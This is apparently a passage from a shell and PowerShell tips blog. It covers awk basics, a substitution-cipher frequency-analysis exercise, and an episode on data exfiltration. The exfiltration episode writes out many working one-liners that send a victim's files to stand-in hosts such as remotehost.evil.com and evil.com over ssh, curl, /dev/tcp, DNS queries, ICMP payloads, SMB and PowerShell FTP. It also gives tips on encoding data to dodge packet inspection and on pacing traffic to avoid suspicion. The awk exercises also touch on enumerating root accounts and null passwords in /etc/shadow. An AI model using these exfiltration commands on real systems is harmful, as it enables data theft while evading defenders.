"$5 ~ /[0-9/" means do a pattern match specifically against field 5 and make sure it contains at least one digit. And then we check to make sure that field 5 is greater than 80. If both of those conditional expressions are true then we'll print out field 6. I made this more complicated that it needs to be just to show you that you can put together complicated logical expressions with "&&" (and "||" for the "or" relationship) and do pattern matching on specific fields if you want to.

Lesson #4 -- You don't have to split on whitespace

While splitting on whitespace is frequently useful, sometimes you're dealing with input that's broken up by some other character, like commas in a CSV file or colons in /etc/passwd. awk has a "-F" option that lets you specify a delimiter other than whitespace.

Here's a little trick to find out if you have any duplicate UIDs in your /etc/passwd file:

$ awk -F: '{print $3}' /etc/passwd | sort | uniq -d

Here we're merely using awk to pull the UID field (field 3) from the colon-delimited ("-F:") /etc/passwd file. Then we sort the UIDs and use "uniq -d" to tell us if there are any duplicates. You want this command to return no output, indicating no duplicates were found.

The Rest is Practice

There's a lot more to awk, but this is more than enough to get you started with this useful little utility. But like any new skill, the best way to master awk is practice. So I'm going to give you a few exercises to work on. I'll post the answers on the blog in a week or so. Good luck!

  1. If you go back and look at the example where I counted the number of processes per user, you'll notice that the "UID" header from the ps command ends up being counted. How would you suppress this?

  2. Print out the usernames of all accounts with superuser privileges (UID is 0 in /etc/passwd).

  3. Print out the usernames of all accounts with null password fields in /etc/shadow.

  4. Print out process data for all commands being run as root by interactive users on the system (HINT: If the command is interactive, then the "TTY" column will have something other than a "?" in it)

  5. I mentioned that if you kill all the sshd processes while logged in via SSH, you'll be kicked out of the box (you killed your own sshd process) and unable to log back in (you've killed the master SSH daemon). Fix the awk so that it only prints out the PIDs of SSH daemon processes that (a) don't belong to you, and (b) aren't the master SSH daemon (HINT: The master SSH daemon is the one who's parent process ID is 1).

  6. Use awk to parse the output of the ifconfig command and print out the IP address of the local system.

  7. Parse the output of "lsof -nPi" and output the unique process name, PID, user ID, and port combinations for all processes that are in "LISTEN" mode on ports on the system.

Tuesday, January 24, 2012

Episode #165: What's the Frequency Kenneth?

Tim helps Tim crack the code

Long time reader, second time caller emailer writes in:

I've always been interested in mystery and codes (going back to 'Mystery Club' in 7th Grade), and today I discovered a cool show on History Channel called Decoded. They were talking about cryptography, specifically frequency analysis. I'm not an educator here but just to make sure we're on the same page: frequency analysis is one method of cracking a cipher by calculating how many times a certain cipher letter appears. From there, one can make a best guess on what the most frequent letters are.

Ok anyway, I've been doing some fun cipher puzzles in my spare time and thought about how this could be code. Say we have a document with a cipher text (letters or numbers, separated by a comma or space). Is it possible to write a code to do a frequency analysis on the ciphertext and maybe even replace the cipher with the results? So if the most frequent cipher are 13 and 77, alter the document and replace 13 and 77, with the most common letters E and T, for example.


This type of statistical analysis works better with longer ciphertext. So I created a substitution cipher that produced the following output. For the sake of simplicity, I didn't replace the punctuation and the spaces

"YETU HTPVI MOF UELCP MOF STC LCRVCU T DOOZ SLXEVW LK MOF ETRV CO VQXVWULIV LC UEV IFNAVSU? HTMNV MOF STC, NFU LU'I COU UVWWLNJM JLPVJM. LHTDLCV EOY MOF YOFJZ WVTSU LK MOFW ZOSUOW UOJZ MOF "MOF ETRV TXXVCZLSLULI, T ZLIVTIV UETU LI JLKV-UEWVTUVCLCD LK COU UWVTUVZ. YV ETRV T ULHV-UVIUVZ SFWV UETU SFWVI 99% OK TJJ XTULVCUI YLUE CO COULSVTNJV ILZV-VKKVSUI, NFU L'H COU DOLCD UO DLRV MOF UETU: L'H DOLCD UO DLRV MOF T CVY VQXVWLHVCUTJ UWVTUHVCU HM SOFILC ZWVTHVZ FX JTIU YVVP. CO, HM SOFILC ETI CO HVZLSTJ UWTLCLCD. CO, L ETRV CO VRLZVCSV UETU UEV CVY UWVTUHVCU YLJJ YOWP, TCZ LU'I CVRVW NVVC UVIUVZ OW TCTJMBVZ LC ZVXUE -- NFU L'H DOLCD UO DLRV LU UO MOF TCMYTM NVSTFIV HM SOFILC UELCPI LU LI DOOZ IUFKK." MOF'Z KLCZ TCOUEVW ZOSUOW, L EOXV. WTULOCTJ XVOXJV JVTRV HVZLSTJ STWV UO UEV HVZLSTJ VQXVWUI. UEV HVZLSTJ VQXVWUI ETRV T HFSE NVUUVW UWTSP WVSOWZ UETC UEV GFTSPI."
-- ZTRLZ YTDCVW XEZ, ISL.SWMXU, 19UE OSU 02.


We can read a file using the command Get-Content (alias cat, gc, type) as we usually do, but let's use a Here-String instead.

PS C:\> $ciphertext = @"
"YETU HTPVI MOF UELCP MOF STC LCRVCU T DOOZ SLXEVW LK MOF ETRV CO VQXVWULIV LC UEV IFNAVSU?
HTMNV MOF STC, NFU LU'I COU UVWWLNJM JLPVJM. LHTDLCV EOY MOF YOFJZ WVTSU LK MOFW ZOSUOW UOJZ
MOF "MOF ETRV TXXVCZLSLULI, T ZLIVTIV UETU LI JLKV-UEWVTUVCLCD LK COU UWVTUVZ. YV ETRV T ULHV-
UVIUVZ SFWV UETU SFWVI 99% OK TJJ XTULVCUI YLUE CO COULSVTNJV ILZV-VKKVSUI, NFU L'H COU DOLCD
UO DLRV MOF UETU: L'H DOLCD UO DLRV MOF T CVY VQXVWLHVCUTJ UWVTUHVCU HM SOFILC ZWVTHVZ FX JTIU
YVVP. CO, HM SOFILC ETI CO HVZLSTJ UWTLCLCD. CO, L ETRV CO VRLZVCSV UETU UEV CVY UWVTUHVCU
YLJJ YOWP, TCZ LU'I CVRVW NVVC UVIUVZ OW TCTJMBVZ LC ZVXUE -- NFU L'H DOLCD UO DLRV LU UO MOF
TCMYTM NVSTFIV HM SOFILC UELCPI LU LI DOOZ IUFKK." MOF'Z KLCZ TCOUEVW ZOSUOW, L EOXV. WTULOCTJ
XVOXJV JVTRV HVZLSTJ STWV UO UEV HVZLSTJ VQXVWUI. UEV HVZLSTJ VQXVWUI ETRV T HFSE NVUUVW UWTSP
WVSOWZ UETC UEV GFTSPI."
-- ZTRLZ YTDCVW XEZ, ISL.SWMXU, 19UE OSU 02.
"@


The we start a Here-String with @" and close it with the matching "@ pair. Now we have a variable $cipher that contains our text. Next, let's get the frequency of each character used in our ciphertext.

PS C:\> ($ciphertext | Select-String -AllMatches "[A-Z]").matches | 
group value -noel | sort count -desc


Count Name
----- ----
90 V
76 U
58 L
55 T
53 O
47 C
31 W
29 E
29 S
28 Z
28 I
27 F
22 M
21 J
19 H
15 D
15 X
13 R
12 Y
10 N
10 K
8 P
4 Q
1 G
1 B
1 A


We start by piping the ciphertext into the Select-String cmdlet where we use the regular expression "[A-Z]" to select each alphabet character individually. The AllMatches switch is used to return all the characters instead of just the first one found. The results are passed down the pipeline into the Group-Object cmdlet (alias group) to give us the count. The NoElement switch (shortened to noel) is used to discard the original objects as we don't need them in the output.

Let's save the letters into a variable so we can use it later for substitution.

PS C:\> $cipherletters = ($ciphertext | Select-String -AllMatches "[A-Z]").matches | 
group value -noel | sort count -desc | % { $_.Name }

PS C:\> $cipherletters
V
U
L
T
O
C
W
...


We used the same command as above, except with the added ForEach-Object cmdlet (alias %) where the value of the Name property is output and stored in our variable.

Now that we have our letters sorted by their frequency we need to compare them with the statistic frequency of characters in the English language.

e  12.702%
t 9.056%
a 8.167%
o 7.507%
i 6.966%
n 6.749%
s 6.327%
h 6.094%
r 5.987%
d 4.253%
l 4.025%
c 2.782%
u 2.758%
m 2.406%
w 2.360%
f 2.228%
g 2.015%
y 1.974%
p 1.929%
b 1.492%
v 0.978%
k 0.772%
j 0.153%
x 0.150%
q 0.095%
z 0.074%


We aren't going to worry about the percentages and we'll just get the letters in order. Later we'll map the two data sets together for our replacement.

PS C:\> $freqletters = "e","t","a","o","i","n","s","h","r","d","l","c","u",
"m","w","f","g","y","p","b","v","k","j","x","q","z"


Now for a quick substitution.

PS C:\> $replacedtext = $ciphertext
PS C:\> for ($i=0; $i -lt 26; $i++) { $replacedtext = $replacedtext -creplace
$cipherletters[$i], $freqletters[$i] }


We use a For loop to count from 0 to 25 where $i is used as the iterator. The iterator is used to match the Nth item in each array (remember, base zero) and use the mapped characters for replacement. The CReplace operator is used for a case sensitive replacement as our cipher letters are upper case and our clear text letters are lower case. This is done to prevent double substitution.

Now to see what our output looks like.

PS C:\> $replacedtext
"phot wokel uic thank uic ron anyent o fiid raghes av uic hoye ni ejgestale an the lcbzert?
woube uic ron, bct at'l nit tessabmu makemu. awofane hip uic picmd seort av uics dirtis timd
uic "uic hoye oggendaratal, o daleole thot al mave-thseotenanf av nit tseoted. pe hoye o tawe-
telted rcse thot rcsel 99% iv omm gotaentl path ni nitareobme lade-evvertl, bct a'w nit fianf
ti faye uic thot: a'w fianf ti faye uic o nep ejgesawentom tseotwent wu riclan dseowed cg molt
peek. ni, wu riclan hol ni wedarom tsoananf. ni, a hoye ni eyadenre thot the nep tseotwent
pamm pisk, ond at'l neyes been telted is onomuqed an degth -- bct a'w fianf ti faye at ti uic
onupou berocle wu riclan thankl at al fiid ltcvv." uic'd vand onithes dirtis, a hige. sotainom
geigme meoye wedarom rose ti the wedarom ejgestl. the wedarom ejgestl hoye o wcrh bettes tsork
serisd thon the xcorkl."
-- doyad pofnes ghd, lra.rsugt, 19th irt 02.


Well, that isn't great. It looks like the only words successfully decryted are "the" and "been". There are a few more techniques for cryptanalysis of this type of cipher

With a bit of tweeking and adjustment of the frequency letters we can end up with the following.

"What makes you think you can invent a good cipher if you have no expertise in
the subject? Maybe you can, but it's not terribly likely. Imagine how you would react
if your doctor told you "You have appendicitis, a disease that is life-threatening if
not treated. We have a time-tested cure that cures 99% of all patients with no
noticeable side-effects, but I'm not going to give you that: I'm going to give you a
new experimental treatment my cousin dreamed up last week. No, my cousin has no
medical training. No, I have no evidence that the new treatment will work, and it's
never been tested or analyzed in depth -- but I'm going to give it to you anyway
because my cousin thinks it is good stuff." You'd find another doctor, I hope.
Rational people leave medical care to the medical experts. The medical experts have a
much better track record than the quacks."
-- David Wagner PhD, sci.crypt, 19th Oct 02.


Let's see if Hal is a better cracker than I am.

Hal gets cracking

Gah. I was always terrible at these puzzles as a child. Maybe my shell can help!

Getting the frequency counts is just a matter of piling up a bunch of shell primatives:

$ sed 's/[^A-Z]//g; s/\(.\)/\1\n/g' cyphertext | grep '[A-Z]' | 
sort | uniq -c | sort -nr

90 V
76 U
58 L
55 T
53 O
...

Notice there's two substitutions in the sed program. The first eliminates anything that's not an uppercase letter. The second puts a newline after each letter in the remaining text. So what I get is each letter from the input text on a line by itself.

Unfortunately, sed doesn't give me a good way to deal with the newlines in the original message. So after the last letter on each line I'm going to get the newline I add with sed, followed by the newline from the original input file. This gives me blank lines in the sed output and I don't want them! The next grep in the pipeline takes care of only giving me the lines that have letters on them.

From there I sort my output and then use "uniq -c" to count the occurrences of each letter. The final "sort -nr" gives me the counts in descending order.

Now let's add a little awk:

$ sed 's/[^A-Z]//g; s/\(.\)/\1\n/g' cyphertext | grep '[A-Z]' | 
sort | uniq -c | sort -nr | awk 'BEGIN {ORS = ""} {print $2}'

VULTOCWSEZIFMJHXDRYNKPQGBA

The awk I've added prints out the letters from my frequency chart. Normally awk would print them out one per line, just like they are in the input. But in the BEGIN block I'm telling awk to use the null string as the "output record separator" (ORS) instead of the usual newline. That gives me the letters all on one line without any whitespace.

Why is this useful? Because now I can do this:

$ cat cyphertext | tr $(sed 's/[^A-Z]//g; s/\(.\)/\1\n/g' cyphertext | grep '[A-Z]' |
sort | uniq -c | sort -nr |awk 'BEGIN {ORS = ""} {print $2}') \
etaoinshrdlcumwfgypbvkjxqz

"prot wokel uic trank uic hon anyent o giid hafres av uic roye ni ejfestale an tre
lcbzeht? woube uic hon, bct at'l nit tessabmu makemu. awogane rip uic picmd seoht av
uics dihtis timd uic "uic roye offendahatal, o daleole trot al mave-trseotenang av nit
tseoted. pe roye o tawe-telted hcse trot hcsel 99% iv omm fotaentl patr ni nitaheobme
lade-evvehtl, bct a'w nit giang ti gaye uic trot: a'w giang ti gaye uic o nep
ejfesawentom tseotwent wu hiclan dseowed cf molt peek. ni, wu hiclan rol ni wedahom
tsoanang. ni, a roye ni eyadenhe trot tre nep tseotwent pamm pisk, ond at'l neyes been
telted is onomuqed an deftr -- bct a'w giang ti gaye at ti uic onupou behocle wu
hiclan trankl at al giid ltcvv." uic'd vand onitres dihtis, a rife. sotainom feifme
meoye wedahom hose ti tre wedahom ejfestl. tre wedahom ejfestl roye o wchr bettes
tsohk sehisd tron tre xcohkl."
-- doyad pognes frd, lha.hsuft, 19tr iht 02.

What I did there was take my pipeline and put it inside "$(...)" so that the output of the pipeline becomes the first argument to my tr command. The letters in the list produced by my pipeline get replaced in with the letters in the standard English frequency chart.

Unfortunately, as Tim found out, the standard frequency chart doesn't work. Actually, my results are different from Tim's first attempt. I think he was cheating some where to get his "the"'s decoded correctly!

If at first you don't succeed, try, try again. We could just keep trying different permutations of our frequency list:

$ freqlist=$(sed 's/[^A-Z]//g; s/\(.\)/\1\n/g' cyphertext | grep '[A-Z]' | 
sort | uniq -c | sort -nr |awk 'BEGIN {ORS = ""} {print $2}')

$ permute etaoinshrdlcumwfgypbvkjxqz |
while read replace; do
misspell=$(cat cyphertext | tr $freqlist $replace | spell | wc -l);
[[ $misspell -lt 10 ]] && echo $replace && break;
(( $((++c)) % 1000 )) || echo -n . 1>&2;
done

First I assign the frequency analysis of my cyphertext to a variable so I don't have to keep recomputing it.

Next I cheat a whole lot by using a script I wrote a long time ago called permute that produces a list of all possible permutations of its input. My while loop reads those permutations one at a time and tries them via tr. The output of tr goes into spell which will give a list of the misspelled words. I count the number of misspelled words with "wc -l". If the number of misspellings is small, then I've probably found the right replacement list. In that case I'll output the $replace list that seems to work and terminate the loop with break.

The last line of the loop is the trick I showed you in Episode #163 for showing progress output in a loop. Every 1000 permutations tried, we'll output a dot just so you know that things are working.

Be prepared for a lot of dots, however. Unfortunately there are 26! = 4E26 possible permutations, which might take you-- or your computer-- more than a little while to test. Brute force really isn't a practical solution for this problem. But I wanted to show you that there is a solution that you could implement in shell (modulo my dirty little permute script), even if it is a lousy one.

Tuesday, January 10, 2012

Episode #164: Exfiltration Nation

Hal pillages the mailbox

Happy 2012 everybody!

In the days and weeks to come, the industry press will no doubt be filled with stories of all the high-profile companies whose data was "liberated" during the past couple of weeks. It may be a holiday for most of us, but it's the perfect time for the black hats to be putting in a little overtime with their data exfiltration efforts.

So it was somehow appropriate that we found that loyal reader Greg Hetrick had emailed us this tasty little bit of command-line exfiltration fu:

tar zcf - localfolder | ssh remotehost.evil.com "cd /some/path/name; tar zxpf -"

Ah, yes, the old "tar over SSH" gambit. The nice thing here is that no local file gets written, but you end up with a perfect directory copy over on "remotehost.evil.com" in a target directory of your choosing.

If SSH is your preferred outbound channel, and the local system has rsync installed, you could accomplish the same mission with fewer keystrokes:

rsync -aH localhost remotehost.evil.com:/some/path/name

If outbound port 22 is being blocked, you could use "ssh -p" or "rsync --port" to connect to the remote server on an alternate port number. Ports 80 and 443 are often open in the outbound direction when other ports are not.

But what if outbound SSH connections-- especially SSH traffic on unexpected port numbers-- are being monitored by your victim? Greg's email got me thinking about other stealthy ways to move data out of an organization using only command-line primitives.

My first thought was everybody's favorite exfiltration protocol: HTTPS. And nothing makes moving data over HTTPS easier than curl:

tar zcf - localfolder | curl -F "data=@-" https://remotehost.evil.com/script.php

"curl -F" fakes a form POST. In this case, the submitted parameter name will be "data". Normally you would use "@filename" after the "data=" to post the contents of a file. But we don't want to write any files locally, so we use "@-" to tell curl to take data from the standard input.

Of course, you'd also have to create script.php over on the remote web server and have it save the incoming data so that you could manually unpack it later. And, while it's commonly found on Linux systems, curl is not a built-in tool. So strictly speaking, I'm not supposed to be using it according to the rules of our blog.

So no SSH and now no curl. What's left? Well, I could just shoot the tarball over the network in raw mode:

tar zcf - localfolder >/dev/tcp/remotehost.evil.com/443

"/dev/tcp/remotehost.evil.com/443" is the wonderful bash-ism that allows me to make connections to arbitrary hosts and ports via the command-line. Note that because the "/dev/tcp/..." hack is a property of the bash shell, I can't use it as a file name argument to "tar -f". Instead I have to use redirection like you see in the example.

Maybe my victim is doing packet inspection. Perhaps I don't want to just send the unobfuscated tarball. I could use xxd to encode the tarball as a hex dump before sending:

tar zcf - localfolder | xxd -p >/dev/tcp/remotehost.evil.com/443

You would use "xxd -r" on the other end to revert the hex dump back into binary.

Instead of xxd, I could use "base64" for a simple base64 encoding. But that might be too obvious. How about a nice EBCDIC encoding on top of the base64:

tar zcf - localfolder | base 64 | dd conv=ebcdic >/dev/tcp/remotehost.evil.com/443

Use "dd conv=ascii if=filename | base64 -d" on the remote machine to get your data back. I'm guessing that nobody looking at the raw packet data would suspect EBCDIC as the encoding though.

Doing something like XOR encoding on the fly turns into a script, unfortunately. But there are some cool examples in several different languages (including the Unix shell and Windows Powershell) over here.

Or how about using DNS queries to exfiltrate data:

tar zcf - localfolder | xxd -p -c 16 |
while read line; do host $line.domain.com remotehost.evil.com; done

Once again I'm using xxd to encode my tar file as a hex dump. I read the hex dump line by line and use each line of data as the "host name" portion of a DNS query to my nameserver on remotehost.evil.com. By monitoring the DNS query traffic on the remote machine, I can reassemble the encoded data to get my original file content back.

Note that I've added the '-c 16" option to the xxd command to output 16 bytes (32 characters) per line. That way my "host names" are not flagged as invalid for being too long. You might also want to throw a "sleep" statement into that loop so that your victim doesn't become suspicious of the sudden blast of DNS queries leaving the box.

I could so something very similar using the ping command on Linux to exfiltrate my data in ICMP echo request packets:

tar zcf - localfolder | xxd -p -c 16 |
while read line; do ping -p $line -c 1 -q remotehost.evil.com; done

The Linux version of ping lets me use "-p" to specify up to 16 bytes of data to be included in the outgoing packet. Unfortunately, this option may not be supported on other Unix variants. I'm also using "-c 1" to send only a single instance of each packet and "-q" to reduce the amount of output I get. Of course, I'd have to scrape the content out of the packets on the other side, which will require a bit of scripting.

Well, I hope that gets your creative juices flowing. There's just so many different ways you can obfuscate data and move it around the network using the bash shell. But I think I better stop here before I make Tim cry. Now Tim, stop your sobbing and show us what you've got in Windows.

Tim wipes away his tears

I asked Santa for a few features to appear in Windows that are native to Linux, but all I got was a lump of coal. I keep asking Santa every year and he never writes back. I know people told me he doesn't exist, but HE DOES. He gave me a skateboard when I was 7. So yes, my apparent shunning by Santa made me cry.

I've got no built in commands for ssh, tar, base64, curl/wget, dev tcp, or any of the cool stuff Hal has. FTP could be used, and can support encryption, but you have to write a script for the FTP command (similar to this). While PowerShell scripts could be written to implement most of these functions, that would definitely cross into The Land of Scripts (and they have a restraining order against us, something about Hal not wearing pants last time he visited).

That pretty much leaves SMB connections and that has a number of problems. First, we don't have encryption, which may mean we can't use it on a Pen Test. Second, port 445 is usually heavily monitored or filtered. Third, we can't pick a different port and we are stuck with 445.

On the bright side it means that my portion of this episode is going to be short. First, we create the connection back to our server.

C:\> net use z: \\4.4.4.4\myshare myevilpassword1 /user:myeviluser


Then we can copy all the files we want to the Z. drive. We can accomplish this using Robocopy or PowerShell's Copy-Item (aliases copy, cp, and cpi) with the -Recurse switch.

Yep, that's it. Now back to my crying. Oh, and Happy Stinking New Year.

Edit: Marc van Orsouw writes in with the following
Some remarks about PowerShell options :

Of course you do not need the net use in PowerShell you can use UNC directly.
And there are a lot of options in your wishlist that can be done using .NET (mostly resulting in scripts on oneliners of course, so keep your list ;), although PSCX will solve a lot of them)

Some options I came up with :

A IMHO opinion another cool option is using PowerShell remoting (already encrypted)

This could be as easy as :

Invoke-Command -ComputerName evilserver {PARAM($txt);set-content stolen.txt $txt} -ArgumentList (get-content usernames.txt)

Some Ugly FTP example with Base64

[System.Net.FtpWebRequest][System.Net.WebRequest]::Create('ftp://evil.com/p.txt') |% {$_.Method = "STOR";$s = [byte[]][convert]::ToBase64String([System.IO.File]::ReadAllBytes('C:\username.txt')).tochararray();$_.GetRequestStream().Write($s, 0, $s.Length)}

And with Web service when remote server available (as in the PHP example) than it would be as simple as :

(New-WebServiceProxy -uri http://evil.com/store.asmx?WSDL).steal((get-content file.txt))


We can just use the UNC path (\\1.1.1.1\share instead of z:\) for exfiltration, but if we want to authenticate the best way is to use NET USE first.

The PowerShell Community Extensions (PSCX) do give a lot of cool functionality, but they are add-ons and not allowed. Similarly, the .NET framework gives us tremendous power, but crosses into script-land rather quickly and is also not allowed.

The remoting command is really cool *and* it is encrypted too. I forgot about this one. The New-WebServiceProxy cmdlet is a really intriguing way to do this as well. I have never used this cmdlet before, and if we use HTTPS instead of HTTP it would be encrypted too. Very nice!

Edit 2: Marc van Orsouw has another cool suggestions
PS C:\> Import-Module BitsTransfer
PS C:\> Start-BitsTransfer -Source c:\clienttestdir\testfile1.txt -Destination https://server01/servertestdir/testfile1.txt
-TransferType Upload -cred (get-credential)


Mark is a PowerShell MVP and blogs over at http://thepowershellguy.com/